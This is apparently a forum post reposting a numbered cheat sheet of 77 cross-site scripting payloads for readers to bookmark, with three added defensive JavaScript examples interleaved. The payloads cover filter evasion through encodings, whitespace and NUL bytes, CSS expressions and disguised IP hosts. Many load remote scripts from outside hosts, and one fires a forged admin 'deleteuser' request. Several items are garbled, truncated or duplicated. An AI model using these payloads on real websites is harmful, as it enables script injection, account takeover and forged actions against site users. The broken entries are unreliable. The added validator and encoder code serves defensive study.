There doesn't seem to be much material about XSS on t00ls, so I'm copying over some good stuff I came across, in case any of you want to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2 (null characters are basically ineffective in China, since there is nowhere they can be used)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
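
As an added example that is not part of the original post or of the cheat sheet it copies: items (3) through (19) all hide the same javascript: scheme behind case changes, HTML entities (with or without the semicolon), embedded tabs, newlines and carriage returns, NUL bytes and leading whitespace. A validator that inspects the raw string misses every one of them; it has to undo those transformations the way the browser's parser will, and only then look at the scheme. The function names, the small entity table and the scheme allowlist below are my own choices, not anything from the post.

```javascript
// Added example, not from the original post. Undo the transformations items
// (3)-(19) use to hide a URL scheme, then check the scheme against an allowlist.
// Function names, NAMED_ENTITIES and ALLOWED_SCHEMES are my own choices.

// A few named entities that matter inside a URL; numeric forms are handled generically.
const NAMED_ENTITIES = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n', nbsp: '\u00a0',
};

// Decode &#106; / &#106 / &#x6A; / &#x6A and the named entities above. The
// semicolon is optional because HTML parsers accept the unterminated form too,
// which is exactly what items (9) and (10) rely on.
function decodeEntities(s) {
  return String(s).replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);?/gi, (match, hex, dec, name) => {
    let code;
    if (hex !== undefined) code = parseInt(hex, 16);
    else if (dec !== undefined) code = parseInt(dec, 10);
    else {
      const v = NAMED_ENTITIES[name.toLowerCase()];
      return v === undefined ? match : v;
    }
    return code > 0x10ffff ? '\ufffd' : String.fromCodePoint(code);
  });
}

// Mirror the browser's URL pre-processing: tab, LF and CR are removed anywhere
// in the string, NUL bytes are dropped (item 17), and leading/trailing C0
// controls, spaces and the Unicode blanks listed in item (47) are trimmed.
function normalizeUrl(raw) {
  return decodeEntities(raw)
    .replace(/[\t\n\r\0]/g, '')
    .replace(/^[\x00-\x20\u00a0\u2000-\u200b\u3000\ufeff]+|[\x00-\x20\u00a0\u2000-\u200b\u3000\ufeff]+$/g, '');
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// True only for relative URLs and for absolute URLs whose scheme is allowlisted.
// Everything else (javascript:, vbscript:, data:, ...) is rejected, whatever
// spelling or encoding it arrived in.
function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;                       // no scheme at all: relative URL
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Constructed inputs: two benign URLs, then one spelling per obfuscation above.
const URL_SAMPLES = [
  'http://example.com/page',                 // allowed
  '/relative/path',                          // allowed
  "javascript:alert('XSS')",                 // (3)
  "JaVaScRiPt:alert('XSS')",                 // (4)
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)', // (5)
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',       // (10)
  "jav\tascript:alert('XSS')",               // (11)
  "jav&#x09;ascript:alert('XSS')",           // (12)
  "jav\nascript:alert('XSS')",               // (13)
  "java\0script:alert('XSS')",               // (17)
  " javascript:alert('XSS')",                // (19)
];

for (const s of URL_SAMPLES) console.log(JSON.stringify(s), '->', isSafeUrl(s));
```

The allowlist approach is deliberate: a blocklist of "javascript" spellings is what the thirteen variants above are built to defeat, whereas after normalisation a scheme either is http, https or mailto or it is not. Note that a scheme-relative URL such as item (74)'s //host/ passes this check, because it carries no scheme; if the host matters too, it needs its own canonicalisation and allowlist.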

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
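
Added example, not from the original post: items (29) and (30) work because user data lands inside a JavaScript string literal or inside the TITLE element, and the characters that close those contexts (a backslash followed by a quote, a literal `</TITLE>`) are passed through unchanged. The code below is mine, with hypothetical function names; it shows why escaping only the quote character is not enough in a script string, and what context-specific output encoding of those same two inputs looks like.

```javascript
// Added example, not from the original post. Output encoders for the two
// contexts items (29) and (30) break out of, next to the naive escaper that
// item (29) defeats. Function names are my own.

// Naive "escape the quote" filter: turns " into \". Item (29)'s input puts a
// backslash *before* the quote, so the filter produces \\" and the parser reads
// \\ as one literal backslash; the quote still terminates the string.
function naiveQuoteEscape(s) {
  return String(s).replace(/"/g, '\\"');
}

// JS string context: encode every character outside [A-Za-z0-9] as \xHH or
// \uHHHH. No raw quote, backslash, newline or '<' reaches the parser, so
// neither the backslash trick nor a </script> inside the data can close anything.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// HTML text / attribute context: numeric entity for &, <, >, ", ' and /.
// A '<' that has become &#60; can no longer open the </TITLE> of item (30).
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

function renderTitle(userTitle) {
  return '<TITLE>' + encodeForHtml(userTitle) + '</TITLE>';
}

// name is assumed to be a developer-controlled identifier; only value is untrusted.
function renderScriptVar(name, value) {
  return '<SCRIPT>var ' + name + '="' + encodeForJsString(value) + '";</SCRIPT>';
}

// Let the JavaScript parser itself decode the encoded string, which shows the
// encoding is lossless: the script sees exactly the original value, as data.
function roundTripViaJsParser(value) {
  return new Function('return "' + encodeForJsString(value) + '";')();
}

// Constructed inputs: the two payload strings from items (29) and (30).
const ITEM_29 = '\\";alert(\'XSS\');//';
const ITEM_30 = '</TITLE><SCRIPT>alert("XSS");</SCRIPT>';

console.log(naiveQuoteEscape(ITEM_29));      // the string literal is closed here
console.log(renderScriptVar('t', ITEM_29));  // only the two delimiter quotes remain
console.log(renderTitle(ITEM_30));           // no raw '<' left inside the element
console.log(roundTripViaJsParser(ITEM_29) === ITEM_29);
```

The general rule the two encoders illustrate is that the encoding must match the context the data is written into (JS string, HTML text, attribute value, URL), and that an allowlist of characters left untouched is easier to reason about than a blocklist of characters to escape.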

(31) Input image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) Split expression in a STYLE attribute
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by any letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands (can execute arbitrary commands)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing character filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot / absolute DNS
<A HREF="http://www.google.com./">XSS</A>
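
Added example, mine rather than the post's or the cheat sheet's: items (68) to (76) name a host in forms that a plain string comparison will never recognise as the same thing: a single 32-bit decimal integer, hex or octal components, a mix of the three, a scheme-relative URL, or a name with a trailing dot. A host allowlist therefore has to canonicalise the host first. The function names and the allowlist below are my own; the component rules (0x prefix means hex, a leading 0 means octal, otherwise decimal, and the last component fills whatever bytes remain) are the ones browsers apply to numeric IPv4 hosts.

```javascript
// Added example, not from the original post. Canonicalise the host of a URL
// before comparing it against an allowlist, undoing the spellings items
// (68)-(76) rely on. Function names and ALLOWLIST are my own.

// Parse one dotted component the way browsers do for IPv4 hosts:
// 0x prefix = hex, leading 0 = octal, otherwise decimal. NaN if not numeric.
function parseIPv4Part(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]+$/.test(part)) return parseInt(part.slice(1), 8);
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Dotted-quad form of a numeric IPv4 host, or null if the host is not numeric.
// Fewer than four components are allowed: the last one fills the remaining
// bytes, which is why a single 32-bit integer (item 70) is a valid host.
function parseIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(Number.isNaN)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// Pull the host out of an absolute or scheme-relative URL (item 74), dropping
// userinfo and port. Returns null when there is no authority section at all.
function extractHost(href) {
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(String(href).trim());
  if (!m) return null;
  let authority = m[1];
  const at = authority.lastIndexOf('@');
  if (at !== -1) authority = authority.slice(at + 1);
  const colon = authority.lastIndexOf(':');
  if (colon !== -1 && !authority.includes(']')) authority = authority.slice(0, colon);
  return authority.toLowerCase();
}

// Canonical host: lower-case, no trailing dot (item 76), numeric forms
// rewritten as dotted quads. Null when no host can be found.
function canonicalHost(href) {
  let host = extractHost(href);
  if (host === null || host === '') return null;
  if (host.endsWith('.')) host = host.slice(0, -1);
  return parseIPv4(host) || host;
}

// Allow a URL only if its canonical host is an allowlisted name or a subdomain of one.
function hostAllowed(href, allowlist) {
  const host = canonicalHost(href);
  if (host === null) return false;
  return allowlist.some((a) => host === a || host.endsWith('.' + a));
}

// Constructed allowlist and samples (the spaces in item 73 removed, as a browser would).
const ALLOWLIST = ['google.com'];
const HOST_SAMPLES = [
  'http://3232235521/',            // (70)
  'http://0xc0.0xa8.0x00.0x01/',   // (71)
  'http://0300.0250.0000.0001/',   // (72)
  'http://66.000146.0x7.147/',     // (73)
  '//www.google.com/',             // (74)
  'http://google.com/',            // (75)
  'http://www.google.com./',       // (76)
];

for (const s of HOST_SAMPLES) console.log(s, '->', canonicalHost(s), hostAllowed(s, ALLOWLIST));
```

Modern URL parsers (the WHATWG URL class in browsers and Node) perform the same IPv4 rewriting, so in production the allowlist check can be made on `new URL(href).hostname` after stripping the trailing dot; the hand-written parser above is there to make visible what that canonicalisation actually does to the four spellings in items (70) to (73).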

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>